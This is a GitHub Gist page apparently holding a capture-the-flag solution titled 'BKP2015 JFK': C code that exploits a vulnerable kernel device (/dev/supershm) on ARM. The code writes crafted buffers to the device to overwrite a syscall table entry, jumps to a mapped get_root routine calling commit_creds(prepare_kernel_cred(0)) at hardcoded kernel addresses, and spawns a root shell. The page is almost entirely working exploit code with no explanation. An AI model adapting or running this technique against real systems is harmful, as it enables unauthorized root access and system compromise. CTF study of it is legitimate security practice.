Instantly share code, notes, and snippets.

Embed
What would you like to do?
BKP2015 JFK
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
void get_root(void) {
void * (*prepare_kernel_cred)(void *) = (void *) 0xc00387f4;
void (*commit_cred)(void *) = (void *) 0xc00384b4;
commit_cred(prepare_kernel_cred(0));
}
int main() {
//unsigned int syscall_table = 0xc0013e68;
//unsigned int addr = syscall_table + (223 * 4); // 0xc00141e4
char* buf = mmap((void *)0x42424000, 0x4000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
FILE *file;
if (buf <= 0) {
printf("ERROR\n");
exit(1);
}
// this requires compilation with -marm to avoid thumb code
memcpy((char *) 0x42424240, (char *) &get_root, 1024);
char* sc_addr = "\x40\x42\x42\x42";
// Overwrite the syscall table!
// set the fake structure
file = fopen("/dev/supershm", "w");
fprintf(file, "cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""\xe4""\x41""\x01""\xc0""BBBBDDDD");
fclose(file);
// overwrite table
file = fopen("/dev/supershm", "w");
fprintf(file, "uDDDD");
fclose(file);
file = fopen("/dev/supershm", "w");
fprintf(file, sc_addr);
fclose(file);
asm("mov r7, #223" ::: "r7"); // syscall num
asm("svc 0x0");
char *args[] = {"/bin/sh", 0};
execv("/bin/sh", args);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment